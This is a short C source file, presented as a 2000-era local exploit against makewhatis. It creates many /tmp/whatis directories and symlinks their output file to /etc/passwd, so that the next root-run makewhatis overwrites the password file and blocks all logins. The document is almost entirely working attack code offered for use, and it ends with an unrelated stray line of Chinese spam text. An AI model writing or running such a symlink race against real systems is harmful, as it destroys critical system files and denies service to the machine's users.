/* mw-exp.c makewhatis exploit */ /* grazer@hit2000.org <-- mail comments.. */ /* After running this file.. wait (one day on caldera system) */ /* until makewhatis is ran again */ /* when it is ran, the database will be written to /etc/passwd */ /* making it impossible to login. */ /* gtx to #hit2000 and #darknet */ /* 15-7-2000 GrAzEr1 */ #include #define TARGET_FILE "/etc/passwd " main() { char cmd[102], temp[102], cmd2[102]; char *mkdir = "mkdir /tmp/whatis", *w = "w", *slash = "/"; char *symlink = "ln -s ", *whatis = "/tmp/whatis"; int scores[102]; int i = 0; while(i<=100) /* define the range of the process id here, there might be a lot directories needed to let this sploit work. (advise : 10000 ? ) */ { i++; scores[i]=i; strcpy(cmd, mkdir); strcpy(cmd2, symlink); sprintf(temp,"%d",scores[i]); strcat(cmd, temp); strcat(cmd2, TARGET_FILE); strcat(cmd2, whatis); strcat(cmd2, temp); strcat(cmd2, slash); strcat(cmd2, w); printf("\n Hold on. Making dirs and symlinks (/tmp) \n"); system("clear"); system(cmd); system(cmd2); } printf (" Now sit back and relax until makewhatis is ran again.. :-) \n"); }

亚洲欧美在线